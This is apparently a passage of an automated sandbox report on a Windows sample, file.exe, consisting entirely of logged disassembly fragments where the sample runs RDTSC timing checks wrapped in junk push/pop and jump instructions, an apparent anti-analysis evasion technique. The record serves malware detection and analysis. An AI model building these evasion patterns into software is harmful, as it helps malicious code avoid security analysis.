              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 344492 second address: 344496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3445DA second address: 3445DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3445DE second address: 3445E4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3445E4 second address: 3445F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jns 00007F0CB0C50336h 0x0000000d pop edi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3445F2 second address: 34460F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B268h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34460F second address: 344633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0CB0C50346h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 344633 second address: 344637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3448C2 second address: 3448C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3448C8 second address: 3448D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3458AA second address: 3458B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0CB0C50336h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3458B4 second address: 3458B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3458B8 second address: 3458BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34895D second address: 348962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 291D78 second address: 291D86 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F0CB0C50336h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 291D86 second address: 291D8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 291D8A second address: 291D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F0CB0C50338h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 291D9C second address: 291DA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 291DA4 second address: 291DA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34C3B7 second address: 34C3BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34C3BD second address: 34C3D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F0CB0C5033Ah 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34C3D1 second address: 34C3D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34C3D7 second address: 34C3DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35030D second address: 350311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 350311 second address: 350340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F0CB0C50353h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35C26E second address: 35C280 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0CB0E1B256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F0CB0E1B25Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35BDF4 second address: 35BDFE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0CB0C50336h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35BF49 second address: 35BF4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35BF4D second address: 35BF53 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35BF53 second address: 35BF5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35F528 second address: 35F52D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361C17 second address: 361C21 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0CB0E1B256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361C21 second address: 361C35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 js 00007F0CB0C50338h 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36BC7A second address: 36BCA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B263h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F0CB0E1B258h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36BCA0 second address: 36BCC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50347h 0x00000007 jmp 00007F0CB0C5033Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 377752 second address: 37776B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F0CB0E1B260h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3778DC second address: 3778E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3778E0 second address: 377923 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0CB0E1B256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jne 00007F0CB0E1B26Ch 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F0CB0E1B264h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F0CB0E1B267h 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 377EE2 second address: 377EE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 377EE6 second address: 377EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 377EF0 second address: 377EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 377EF6 second address: 377F42 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0CB0E1B256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F0CB0E1B264h 0x00000011 jmp 00007F0CB0E1B260h 0x00000016 pushad 0x00000017 jmp 00007F0CB0E1B269h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 377F42 second address: 377F59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0CB0C50336h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007F0CB0C50336h 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 378262 second address: 37827A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0CB0E1B263h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37C948 second address: 37C950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37C950 second address: 37C955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37C955 second address: 37C95B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37C95B second address: 37C95F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37C95F second address: 37C965 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38DB4D second address: 38DB63 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0CB0E1B256h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007F0CB0E1B256h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39AFC7 second address: 39AFE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50343h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jns 00007F0CB0C50336h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39AFE8 second address: 39AFEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39ADE0 second address: 39ADEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0CB0C50336h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39ADEA second address: 39ADF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39ADF2 second address: 39ADF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39ADF7 second address: 39AE2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0CB0E1B269h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F0CB0E1B25Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39AE2D second address: 39AE55 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 ja 00007F0CB0C50336h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F0CB0C50336h 0x00000014 jmp 00007F0CB0C50344h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39AE55 second address: 39AE64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B25Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39E95C second address: 39E961 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B747E second address: 3B7483 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B62A3 second address: 3B62B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0CB0C50336h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B644F second address: 3B6456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B6D0D second address: 3B6D13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B6D13 second address: 3B6D29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B25Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B716D second address: 3B7173 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BB90B second address: 3BB90F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BB90F second address: 3BBA0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50348h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0CB0C5033Dh 0x0000000e popad 0x0000000f push eax 0x00000010 jbe 00007F0CB0C50344h 0x00000016 nop 0x00000017 jp 00007F0CB0C5034Ah 0x0000001d push dword ptr [ebp+122D3731h] 0x00000023 push 00000000h 0x00000025 push esi 0x00000026 call 00007F0CB0C50338h 0x0000002b pop esi 0x0000002c mov dword ptr [esp+04h], esi 0x00000030 add dword ptr [esp+04h], 0000001Ah 0x00000038 inc esi 0x00000039 push esi 0x0000003a ret 0x0000003b pop esi 0x0000003c ret 0x0000003d jmp 00007F0CB0C5033Bh 0x00000042 call 00007F0CB0C50339h 0x00000047 jmp 00007F0CB0C50345h 0x0000004c push eax 0x0000004d pushad 0x0000004e jbe 00007F0CB0C50338h 0x00000054 pushad 0x00000055 popad 0x00000056 jmp 00007F0CB0C50345h 0x0000005b popad 0x0000005c mov eax, dword ptr [esp+04h] 0x00000060 jmp 00007F0CB0C50341h 0x00000065 mov eax, dword ptr [eax] 0x00000067 je 00007F0CB0C50342h 0x0000006d jns 00007F0CB0C5033Ch 0x00000073 mov dword ptr [esp+04h], eax 0x00000077 push ebx 0x00000078 pushad 0x00000079 push eax 0x0000007a push edx 0x0000007b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BBA0B second address: 3BBA11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C01FD second address: 3C0203 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C0203 second address: 3C0209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D546E second address: 2D5474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D5474 second address: 2D5478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D566C second address: 2D5672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0250 second address: 4CA02AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B25Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx esi, di 0x0000000e mov si, dx 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 jmp 00007F0CB0E1B268h 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push esi 0x0000001f pop edx 0x00000020 pushfd 0x00000021 jmp 00007F0CB0E1B264h 0x00000026 sbb cl, FFFFFF98h 0x00000029 jmp 00007F0CB0E1B25Bh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA02AE second address: 4CA0310 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50349h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov ecx, 4E06CED3h 0x00000011 push eax 0x00000012 pushfd 0x00000013 jmp 00007F0CB0C5033Fh 0x00000018 adc cx, 9FBEh 0x0000001d jmp 00007F0CB0C50349h 0x00000022 popfd 0x00000023 pop ecx 0x00000024 popad 0x00000025 mov edx, dword ptr [ebp+0Ch] 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b push ecx 0x0000002c pop edx 0x0000002d mov dl, cl 0x0000002f popad 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0010 second address: 4CD001F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B25Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD001F second address: 4CD0025 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0025 second address: 4CD004E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B25Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0CB0E1B265h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD004E second address: 4CD00C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50341h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F0CB0C50343h 0x00000011 sbb cx, 96BEh 0x00000016 jmp 00007F0CB0C50349h 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e jmp 00007F0CB0C5033Eh 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F0CB0C50347h 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD00C3 second address: 4CD00DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0E1B264h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD00DB second address: 4CD017F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F0CB0C5033Ch 0x0000000e mov dword ptr [esp], ecx 0x00000011 jmp 00007F0CB0C50340h 0x00000016 xchg eax, esi 0x00000017 jmp 00007F0CB0C50340h 0x0000001c push eax 0x0000001d jmp 00007F0CB0C5033Bh 0x00000022 xchg eax, esi 0x00000023 jmp 00007F0CB0C50346h 0x00000028 lea eax, dword ptr [ebp-04h] 0x0000002b jmp 00007F0CB0C50340h 0x00000030 nop 0x00000031 jmp 00007F0CB0C50340h 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a jmp 00007F0CB0C5033Ch 0x0000003f call 00007F0CB0C50342h 0x00000044 pop eax 0x00000045 popad 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD017F second address: 4CD0185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0185 second address: 4CD0189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0189 second address: 4CD01B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F0CB0E1B266h 0x0000000e push dword ptr [ebp+08h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD01B1 second address: 4CD01CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50349h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD01CE second address: 4CD01D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD01D4 second address: 4CD01D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0272 second address: 4CD028F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B261h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD028F second address: 4CD0293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0293 second address: 4CD0297 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0297 second address: 4CD029D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD029D second address: 4CD02A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD02A3 second address: 4CD02A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD02A7 second address: 4CD02D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B25Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c pushad 0x0000000d jmp 00007F0CB0E1B25Eh 0x00000012 push esi 0x00000013 mov si, di 0x00000016 pop edi 0x00000017 popad 0x00000018 leave 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c movzx esi, di 0x0000001f rdtsc
